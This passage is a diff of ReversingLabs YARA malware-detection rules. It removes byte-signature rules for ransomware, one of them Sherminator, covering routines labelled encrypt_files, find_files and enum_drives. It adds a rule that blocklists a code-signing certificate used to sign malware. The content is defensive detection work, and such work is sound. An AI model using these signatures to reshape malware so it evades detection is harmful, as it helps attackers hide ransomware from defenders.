-            8D 45 ?? B1 ?? E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 8B D3 E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B
-            85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 E8 ?? 75 1B 8D 85 ?? ?? ?? ?? 8D 55 ?? E8 ?? ?? ?? ?? 8B 95 ?? ?? ??
-            ?? 8B 06 8B 08 FF 51 ?? 43 80 FB ?? 0F 85 65 FF FF FF 33 C0 5A 59 59 64 89 10 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? BA ?? ??
-            ?? ?? E8 ?? ?? ?? ?? C3
-        }
-		$bc_do_extensions_1 = {
-            55 8B EC 81 C4 ?? ?? ?? ?? 53 56 57 33 DB 89 9D ?? ?? ?? ?? 89 9D ?? ?? ?? ?? 89 9D ?? ?? ?? ?? 89 9D ?? ?? ?? ?? 89 9D
-            ?? ?? ?? ?? 89 9D ?? ?? ?? ?? 89 4D ?? 89 55 ?? 89 45 ?? 8B 7D ?? 8B 5D ?? 8B 45 ?? E8 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ??
-            ?? 8B 45 ?? E8 ?? ?? ?? ?? 33 C0 55 68 ?? ?? ?? ?? 64 FF 30 64 89 20 33 C0 55 68 ?? ?? ?? ?? 64 FF 30 64 89 20 8D 85 ??
-            ?? ?? ?? 8B 4D ?? 8B 55 ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 84 C0 0F 85 81 01 00 00 E8 ?? ?? ?? ?? BA ??
-            ?? ?? ?? 33 C0 E8 ?? ?? ?? ?? 8B F0 8B C3 8B 14 B5 ?? ?? ?? ?? E8 ?? ?? ?? ?? EB 28 A0 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ??
-            50 8B 03 33 C9 BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 8B C3 E8 ?? ?? ?? ?? 8B 13 B8 ?? ?? ?? ?? E8 ?? ?? ?? ??
-            85 C0 75 C8 EB 28 A0 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 50 8B 03 33 C9 BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 8B
-            C3 E8 ?? ?? ?? ?? 8B 13 B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 75 C8 FF 75 ?? 68 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? 68 ?? ?? ??
-            ?? 8D 95 ?? ?? ?? ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? 89 B5 ?? ?? ?? ?? DB 85 ?? ?? ?? ?? 83 C4 ?? DB 3C
-        }
-		$bc_do_extensions_2 = {
-            24 9B 8D 95 ?? ?? ?? ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? 8B C7 BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 85 ?? ??
-            ?? ?? 8B 4D ?? 8B 55 ?? E8 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? E8 ?? ?? ??
-            ?? E8 ?? ?? ?? ?? 8B 13 8D 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 17 8D 85 ?? ?? ?? ?? E8 ?? ??
-            ?? ?? E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? BA ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 85
-            ?? ?? ?? ?? E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? B3 ?? EB 02 33 DB 33 C0 5A 59 59 64 89 10 EB 0C E9 ?? ?? ?? ?? 33 DB E8 ?? ??
-            ?? ?? 33 C0 5A 59 59 64 89 10 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ??
-            ?? ?? 8D 45 ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? C3 E9 ?? ?? ?? ?? EB D0 8B C3 5F 5E 5B 8B E5 5D C2
-        }
-		$bc_do_files_1 = {
-            55 8B EC 81 C4 ?? ?? ?? ?? 53 56 57 33 C9 89 8D ?? ?? ?? ?? 89 8D ?? ?? ?? ?? 89 8D ?? ?? ?? ?? 89 4D ?? 89 55 ?? 8B F0
-            8D 85 ?? ?? ?? ?? 8B 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? 33 C0 55 68 ?? ?? ?? ?? 64 FF 30 64 89 20 B3 ?? 8B 06 E8 ?? ?? ?? ??
-            89 45 ?? 8B 16 8D 85 ?? ?? ?? ?? 8B 4D ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ??
-            ?? 8B F8 85 FF 0F 85 91 00 00 00 F6 85 ?? ?? ?? ?? ?? 75 73 56 8D B5 ?? ?? ?? ?? 8D BD ?? ?? ?? ?? B9 ?? ?? ?? ?? F3 A5
-            5E 8B 85 ?? ?? ?? ?? 89 45 ?? 8B 85 ?? ?? ?? ?? 89 45 ?? 8D 45 ?? 33 D2 E8 ?? ?? ?? ?? 83 C4 ?? DD 1C 24 9B 8D 45 ?? E8
-            ?? ?? ?? ?? FF 75 ?? 68 ?? ?? ?? ?? FF 36 FF B5 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 95 ?? ??
-            ?? ?? 8B 45 ?? 8B 40 ?? 8B 00 8B 08 FF 51 ?? 8D 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B F8 85 FF 0F 84 6F FF FF FF 8D 85 ?? ??
-            ?? ?? E8 ?? ?? ?? ?? 84 DB 0F 84 B7 00 00 00 8B 16 8D 85 ?? ?? ?? ?? B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8D
-        }
-		$bc_do_files_2 = {
-            8D ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B F8 85 FF 75 7E F6 85 ?? ?? ?? ?? ?? 74 64 8B 85 ?? ?? ?? ?? BA ?? ?? ??
-            ?? E8 ?? ?? ?? ?? 74 52 8B 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 74 40 FF 36 FF B5 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8B
-            C6 BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 45 ?? 50 8B C6 8B 55 ?? E8 57 FE FF FF 59 84 C0 75 04 33 DB EB 21 8B 55 ?? 42 8B C6
-            B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B F8 85 FF 74 82 8D 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 33 C0
-            5A 59 59 64 89 10 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 8B 15 ?? ?? ?? ?? E8
-            ?? ?? ?? ?? 8D 45 ?? E8 ?? ?? ?? ?? C3
-        }
-		$bc_main_1 = {
-            55 8B EC B9 ?? ?? ?? ?? 6A ?? 6A ?? 49 75 F9 53 56 57 B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 33 C0 55 68 ?? ?? ?? ?? 64 FF 30 64
-            89 20 33 C0 A3 ?? ?? ?? ?? B2 ?? A1 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 55 ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 55 ?? B8 ?? ??
-            ?? ?? B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 55 ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 55 ?? B8 ?? ?? ?? ?? B9 ?? ?? ?? ?? E8 ??
-            ?? ?? ?? B8 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? B8 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? B8 ?? ?? ?? ?? BA ??
-            ?? ?? ?? E8 ?? ?? ?? ?? B8 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? B8 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? BA ??
-            ?? ?? ?? A1 ?? ?? ?? ?? E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? C6 05 ?? ?? ?? ?? ?? 8D 45 ?? E8 ?? ?? ?? ?? 8B 55 ?? B8 ?? ?? ??
-            ?? E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? C7 05 ?? ?? ?? ?? ?? ?? ?? ?? 8D 45 ?? 8B 0D ?? ?? ?? ??
-            8B 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 84 C0 75 7A 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8B 0D ?? ?? ?? ?? 8B
-        }
-		$bc_main_2 = {
-            15 ?? ?? ?? ?? A1 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B D8 8D 45 ?? 8B 0D ?? ?? ?? ?? 8B 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 45 ??
-            E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 55 ?? 33 C0 E8 ?? ?? ?? ?? 8B 45 ?? 50 8D 45 ?? 8B 0D ?? ?? ?? ?? 8B 15
-            ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 55 ?? 58 E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? EB 11 BA ?? ?? ?? ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ??
-            8B D8 B2 ?? A1 ?? ?? ?? ?? E8 ?? ?? ?? ?? A3 ?? ?? ?? ?? 80 FB ?? 0F 85 ?? ?? ?? ?? C6 05 ?? ?? ?? ?? ?? B2 ?? A1 ?? ??
-            ?? ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 80 3D ?? ?? ?? ?? ?? 75 ED A1 ?? ?? ?? ?? 8B 10 FF 52 ?? 83 F8 ?? 0F
-            8E ?? ?? ?? ?? A1 ?? ?? ?? ?? 8B 10 FF 52 ?? 99 F7 3D ?? ?? ?? ?? A3 ?? ?? ?? ?? A1 ?? ?? ?? ?? 8B 10 FF 52 ?? 99 F7 3D
-            ?? ?? ?? ?? 89 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? 48 85 C0 7C ?? 40 89 45 ?? C7 05 ?? ?? ?? ?? ?? ?? ?? ??
-        }
-		$bc_main2 = {
-            E8 ?? ?? ?? ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? 8D 45 ??
-            BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? 6A ?? 6A ?? E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 80 3D
-            ?? ?? ?? ?? ?? 0F 85 ?? ?? ?? ?? 33 C0 5A 59 59 64 89 10 68 ?? ?? ?? ?? 8D 45 ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? C3
-        }
-
 	condition:
-		uint16( 0 ) == 0x5A4D and ( $bc_main_1 at pe.entry_point ) and $bc_main_2 and $bc_main2 and $bc_bcdedit and $bc_enum_drives_a_z and $bc_do_extensions_1 and $bc_do_extensions_2 and $bc_do_files_1 and $bc_do_files_2
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Xingning Dexin Network Technology Co., Ltd." and pe.signatures [ i ] . serial == "03:23:cc:4e:38:73:5b:0e:6e:fb:a7:6e:a2:5c:73:b7" and 1512000000 <= pe.signatures [ i ] . not_after )
 }
-rule REVERSINGLABS_Win32_Ransomware_Sherminator : TC_DETECTION MALICIOUS MALWARE FILE
+
+rule REVERSINGLABS_Cert_Blocklist_1F9Aca069Ac1B6Bfb0E14861Ec857Bf6 : INFO FILE
 {
 	meta:
-		description = "Yara rule that detects Sherminator ransomware."
+		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "99792a22-8027-557f-927f-30eac4d1e690"
-		date = "2020-06-26"
-		modified = "2020-07-15"
+		id = "b78e3bc2-5b65-507a-9183-148f97baa3e8"
+		date = "2020-08-05"
+		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/ransomware/Win32.Ransomware.Sherminator.yara#L1-L157"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L14278-L14294"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "22ac61b95f6ca4530e81a23fdd05be93e368647ca7100097a94eae3c6ce3b7d1"
+		logic_hash = "d7c9a471455768a00deeb73900bf80a98f0b2c9da1fd09d568e2998deaf404d2"
 		score = 75
 		quality = 90
-		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
+		tags = "INFO, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "MALWARE"
-		tc_detection_type = "Ransomware"
-		tc_detection_name = "Sherminator"
-		tc_detection_factor = 5
+		category = "INFO"
 		importance = 25
 
-	strings:
-		$enum_resources_p1 = {
-            55 89 E5 57 53 83 EC ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ??
-            ?? C7 45 ?? ?? ?? ?? ?? 8D 45 ?? 89 44 24 ?? 8B 45 ?? 89 44 24 ?? 8B 45 ?? 89 44 24
-            ?? 8B 45 ?? 89 44 24 ?? 8B 45 ?? 89 04 24 E8 ?? ?? ?? ?? 83 EC ?? 89 45 ?? 83 7D ??
-            ?? 0F 85 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 8B 45 ?? C7 44 24 ??
-            ?? ?? ?? ?? 89 04 24 E8 ?? ?? ?? ?? 89 45 ?? C7 45 ?? ?? ?? ?? ?? 8B 45 ?? 89 44 24
-            ?? C7 44 24 ?? ?? ?? ?? ?? 8B 45 ?? 89 04 24 E8 ?? ?? ?? ?? 8B 45 ?? 8D 55 ?? 89 54
-            24 ?? 8B 55 ?? 89 54 24 ?? 8D 55 ?? 89 54 24 ?? 89 04 24 E8 ?? ?? ?? ?? 83 EC ?? 89
-            45 ?? 83 7D ?? ?? 0F 85 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? E9 ?? ?? ?? ?? 8B 45 ?? 89
-        }
-		$enum_resources_p2 = {
-            45 ?? 8B 45 ?? C1 E0 ?? 89 C2 8B 45 ?? 01 D0 8B 40 ?? 85 C0 0F 84 ?? ?? ?? ?? 8B 45
-            ?? C1 E0 ?? 89 C2 8B 45 ?? 01 D0 8B 40 ?? 89 04 24 E8 ?? ?? ?? ?? 83 C0 ?? 8B 15 ??
-            ?? ?? ?? 8B 0D ?? ?? ?? ?? C1 E1 ?? 8D 1C 0A C7 44 24 ?? ?? ?? ?? ?? 89 04 24 E8 ??
-            ?? ?? ?? 89 03 A1 ?? ?? ?? ?? 8B 15 ?? ?? ?? ?? C1 E2 ?? 01 D0 8B 00 85 C0 0F 84 ??
-            ?? ?? ?? 8B 45 ?? C1 E0 ?? 89 C2 8B 45 ?? 01 D0 8B 50 ?? A1 ?? ?? ?? ?? 8B 0D ?? ??
-            ?? ?? C1 E1 ?? 01 C8 8B 00 89 54 24 ?? 89 04 24 E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? 8B 15
-            ?? ?? ?? ?? C1 E2 ?? 01 D0 8B 10 89 D0 B9 ?? ?? ?? ?? 89 C3 B8 ?? ?? ?? ?? 89 DF F2
-            AE 89 C8 F7 D0 83 E8 ?? 01 D0 66 C7 00 ?? ?? A1 ?? ?? ?? ?? 83 C0 ?? A3 ?? ?? ?? ??
-            8B 45 ?? C1 E0 ?? 89 C2 8B 45 ?? 01 D0 8B 40 ?? 83 E0 ?? 85 C0 74 ?? 8B 45 ?? C1 E0
-            ?? 89 C2 8B 45 ?? 01 D0 89 04 24 E8 ?? ?? ?? ?? EB ?? 90 83 45 ?? ?? 8B 45 ?? 39 45
-            ?? 0F 82 ?? ?? ?? ?? 81 7D ?? ?? ?? ?? ?? 0F 85 ?? ?? ?? ?? 8B 45 ?? 89 04 24 E8 ??
-            ?? ?? ?? 8B 45 ?? 89 04 24 E8 ?? ?? ?? ?? 83 EC ?? 90 90 8D 65 ?? 5B 5F 5D C3
-        }
-		$encrypt_files_p1 = {
-            55 89 E5 57 83 EC ?? 8B 45 ?? 89 04 24 E8 ?? ?? ?? ?? 83 C0 ?? C7 44 24 ?? ?? ?? ??
-            ?? 89 04 24 E8 ?? ?? ?? ?? 89 45 ?? 83 7D ?? ?? 75 ?? 8B 45 ?? 89 04 24 E8 ?? ?? ??
-            ?? A1 ?? ?? ?? ?? FF D0 8B 45 ?? 89 44 24 ?? 8B 45 ?? 89 04 24 E8 ?? ?? ?? ?? 8B 45
-            ?? B9 ?? ?? ?? ?? 89 C2 B8 ?? ?? ?? ?? 89 D7 F2 AE 89 C8 F7 D0 8D 50 ?? 8B 45 ?? 01
-            D0 66 C7 00 ?? ?? C7 44 24 ?? ?? ?? ?? ?? 8B 45 ?? 89 04 24 E8 ?? ?? ?? ?? 8B 45 ??
-            89 04 24 A1 ?? ?? ?? ?? FF D0 83 EC ?? 89 45 ?? C7 44 24 ?? ?? ?? ?? ?? 8B 45 ?? 89
-            04 24 A1 ?? ?? ?? ?? FF D0 83 EC ?? 8B 45 ?? 89 04 24 E8 ?? ?? ?? ?? 89 45 ?? 89 55
-            ?? 83 7D ?? ?? 7F ?? 83 7D ?? ?? 78 ?? 83 7D ?? ?? 77 ?? C7 44 24 ?? ?? ?? ?? ?? 8B
-            45 ?? 89 44 24 ?? 8B 45 ?? 89 04 24 A1 ?? ?? ?? ?? FF D0 83 EC ?? 8B 45 ?? 89 44 24
-            ?? 8B 45 ?? 89 04 24 A1 ?? ?? ?? ?? FF D0 83 EC ?? 8B 45 ?? 89 04 24 E8 ?? ?? ?? ??
-            8B 45 ?? 89 04 24 E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? FF D0 C7 45 ?? ?? ?? ?? ?? DF 6D ??
-            DD 5D ?? DD 45 ?? DD 05 ?? ?? ?? ?? DF E9 DD D8 76 ?? 8B 45 ?? 89 45 ?? EB ?? C7 45
-            ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 8B 45 ?? 89 04 24 E8 ?? ?? ?? ?? 89 45 ?? 83
-            7D ?? ?? 75 ?? 8B 45 ?? 89 44 24 ?? 8B 45 ?? 89 04 24 A1 ?? ?? ?? ?? FF D0 83 EC
-        }
-		$encrypt_files_p2 = {
-            8B 45 ?? 89 04 24 E8 ?? ?? ?? ?? 8B 45 ?? 89 04 24 E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? FF
-            D0 C7 45 ?? ?? ?? ?? ?? C7 04 24 ?? ?? ?? ?? A1 ?? ?? ?? ?? FF D0 83 EC ?? 8B 15 ??
-            ?? ?? ?? A1 ?? ?? ?? ?? 8D 4D ?? 89 4C 24 ?? C7 44 24 ?? ?? ?? ?? ?? 89 54 24 ?? C7
-            44 24 ?? ?? ?? ?? ?? 89 04 24 A1 ?? ?? ?? ?? FF D0 83 EC ?? 85 C0 75 ?? C7 04 24 ??
-            ?? ?? ?? A1 ?? ?? ?? ?? FF D0 83 EC ?? 8B 45 ?? 89 44 24 ?? 8B 45 ?? 89 04 24 A1 ??
-            ?? ?? ?? FF D0 83 EC ?? 8B 45 ?? 89 04 24 E8 ?? ?? ?? ?? 8B 45 ?? 89 04 24 E8 ?? ??
-            ?? ?? 8B 45 ?? 89 04 24 E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? FF D0 C7 04 24 ?? ?? ?? ?? A1
-            ?? ?? ?? ?? FF D0 83 EC ?? C7 44 24 ?? ?? ?? ?? ?? 8B 45 ?? 89 44 24 ?? 8B 45 ?? 89
-            04 24 A1 ?? ?? ?? ?? FF D0 83 EC ?? 85 C0 75 ?? 8B 45 ?? 89 44 24 ?? 8B 45 ?? 89 04
-            24 A1 ?? ?? ?? ?? FF D0 83 EC ?? 8B 45 ?? 89 04 24 A1 ?? ?? ?? ?? FF D0 83 EC ?? 8B
-            45 ?? 89 04 24 E8 ?? ?? ?? ?? 8B 45 ?? 89 04 24 E8 ?? ?? ?? ?? 8B 45 ?? 89 04 24 E8
-            ?? ?? ?? ?? A1 ?? ?? ?? ?? FF D0 C7 44 24 ?? ?? ?? ?? ?? 8B 45 ?? 89 04 24 E8 ?? ??
-            ?? ?? 89 45 ?? C7 44 24 ?? ?? ?? ?? ?? 8B 45 ?? 89 04 24 E8 ?? ?? ?? ?? 89 45 ?? 83
-            7D ?? ?? 74 ?? 83 7D ?? ?? 0F 85 ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 8B 45 ?? 89 44
-            24 ?? 8B 45 ?? 89 04 24 A1 ?? ?? ?? ?? FF D0 83 EC ?? 8B 45 ?? 89 44 24 ?? 8B 45
-        }
-		$encrypt_files_p3 = {
-            89 04 24 A1 ?? ?? ?? ?? FF D0 83 EC ?? 8B 45 ?? 89 04 24 A1 ?? ?? ?? ?? FF D0 83 EC
-            ?? 8B 45 ?? 89 04 24 E8 ?? ?? ?? ?? 8B 45 ?? 89 04 24 E8 ?? ?? ?? ?? 8B 45 ?? 89 04
-            24 E8 ?? ?? ?? ?? 8B 45 ?? 89 04 24 E8 ?? ?? ?? ?? 8B 45 ?? 89 04 24 E8 ?? ?? ?? ??
-            A1 ?? ?? ?? ?? FF D0 8B 45 ?? 89 04 24 E8 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ??
-            ?? ?? ?? ?? E9 ?? ?? ?? ?? 8B 45 ?? BA ?? ?? ?? ?? 39 55 ?? 7F ?? 39 55 ?? 7C ?? 39
-            45 ?? 77 ?? C7 45 ?? ?? ?? ?? ?? 8B 45 ?? 89 44 24 ?? 8B 45 ?? 89 44 24 ?? C7 44 24
-            ?? ?? ?? ?? ?? 8B 45 ?? 89 04 24 E8 ?? ?? ?? ?? 89 45 ?? 83 7D ?? ?? 75 ?? 8B 45 ??
-            89 04 24 E8 ?? ?? ?? ?? 8B 45 ?? 8B 55 ?? 89 54 24 ?? 8D 55 ?? 89 54 24 ?? 8B 55 ??
-            89 54 24 ?? C7 44 24 ?? ?? ?? ?? ?? 8B 55 ?? 89 54 24 ?? C7 44 24 ?? ?? ?? ?? ?? 89
-            04 24 A1 ?? ?? ?? ?? FF D0 83 EC ?? 8B 45 ?? 8B 55 ?? 89 54 24 ?? 89 44 24 ?? C7 44
-            24 ?? ?? ?? ?? ?? 8B 45 ?? 89 04 24 E8 ?? ?? ?? ?? 8B 45 ?? BA ?? ?? ?? ?? 29 45 ??
-            19 55 ?? 83 7D ?? ?? 0F 8F ?? ?? ?? ?? 83 7D ?? ?? 78 ?? 83 7D ?? ?? 0F 87 ?? ?? ??
-            ?? 8B 45 ?? 89 04 24 E8 ?? ?? ?? ?? 8B 45 ?? 89 04 24 E8 ?? ?? ?? ?? 8B 45 ?? 89 04
-            24 A1 ?? ?? ?? ?? FF D0 83 EC ?? 8B 45 ?? 89 44 24 ?? 8B 45 ?? 89 04 24 A1 ?? ?? ??
-            ?? FF D0 83 EC ?? 8B 45 ?? 89 04 24 E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? FF D0
-        }
-		$find_files_p1 = {
-            55 89 E5 57 53 81 EC ?? ?? ?? ?? 8B 45 ?? 89 04 24 E8 ?? ?? ?? ?? 83 C0 ?? C7 44 24
-            ?? ?? ?? ?? ?? 89 04 24 E8 ?? ?? ?? ?? 89 45 ?? 83 7D ?? ?? 75 ?? 8B 45 ?? 89 04 24
-            E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? FF D0 8B 45 ?? 89 04 24 E8 ?? ?? ?? ?? 8B 45 ?? 89 44
-            24 ?? 8B 45 ?? 89 04 24 E8 ?? ?? ?? ?? 8B 45 ?? B9 ?? ?? ?? ?? 89 C2 B8 ?? ?? ?? ??
-            89 D7 F2 AE 89 C8 F7 D0 8D 50 ?? 8B 45 ?? 01 D0 C7 00 ?? ?? ?? ?? 8D 85 ?? ?? ?? ??
-            89 44 24 ?? 8B 45 ?? 89 04 24 A1 ?? ?? ?? ?? FF D0 83 EC ?? 89 45 ?? 83 7D ?? ?? 0F
-            84 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 83 E0 ?? 85 C0 0F 84 ?? ?? ?? ?? 0F B6 95 ?? ?? ??
-            ?? 0F B6 05 ?? ?? ?? ?? 0F B6 D2 0F B6 C0 29 C2 89 D0 85 C0 0F 84 ?? ?? ?? ?? C7 44
-            24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 83 C0 ?? 89 04 24 E8 ??
-            ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 83 C0 ??
-            89 04 24 E8 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 8D 85 ?? ??
-            ?? ?? 83 C0 ?? 89 04 24 E8 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 83
-            E0 ?? 85 C0 0F 85 ?? ?? ?? ?? 8B 45 ?? 89 04 24 E8 ?? ?? ?? ?? 89 C3 8D 85 ?? ?? ??
-            ?? 83 C0 ?? 89 04 24 E8 ?? ?? ?? ?? 01 D8 83 C0 ?? C7 44 24 ?? ?? ?? ?? ?? 89 04 24
-        }
-		$find_files_p2 = {
-            E8 ?? ?? ?? ?? 89 45 ?? 83 7D ?? ?? 0F 84 ?? ?? ?? ?? 8B 45 ?? 89 44 24 ?? 8B 45 ??
-            89 04 24 E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 83 C0 ?? 89 44 24 ?? 8B 45 ?? 89 04 24 E8
-            ?? ?? ?? ?? 8B 45 ?? B9 ?? ?? ?? ?? 89 C2 B8 ?? ?? ?? ?? 89 D7 F2 AE 89 C8 F7 D0 8D
-            50 ?? 8B 45 ?? 01 D0 66 C7 00 ?? ?? A1 ?? ?? ?? ?? 8B 55 ?? 89 54 24 ?? 89 44 24 ??
-            C7 04 24 ?? ?? ?? ?? A1 ?? ?? ?? ?? FF D0 E9 ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 8D
-            85 ?? ?? ?? ?? 83 C0 ?? 89 04 24 E8 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? C7 44 24 ??
-            ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 83 C0 ?? 89 04 24 E8 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ??
-            ?? C7 44 24 ?? ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 83 C0 ?? 89 04 24 E8 ?? ?? ?? ?? 85 C0
-            0F 84 ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 83 C0 ?? 89 04 24 E8 ??
-            ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 83 C0
-        }
-		$find_files_p3 = {
-            89 04 24 E8 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 8D 85 ?? ??
-            ?? ?? 83 C0 ?? 89 04 24 E8 ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 89 04 24 E8 ?? ?? ??
-            ?? 85 C0 0F 84 ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 83 C0 ?? 89 04
-            24 E8 ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 89 04 24 E8 ?? ?? ?? ?? 85 C0 0F 84 ?? ??
-            ?? ?? C7 44 24 ?? ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 83 C0 ?? 89 04 24 E8 ?? ?? ?? ?? C7
-            44 24 ?? ?? ?? ?? ?? 89 04 24 E8 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 8B 45 ?? 89 04
-            24 E8 ?? ?? ?? ?? 89 C3 8D 85 ?? ?? ?? ?? 83 C0 ?? 89 04 24 E8 ?? ?? ?? ?? 01 D8 83
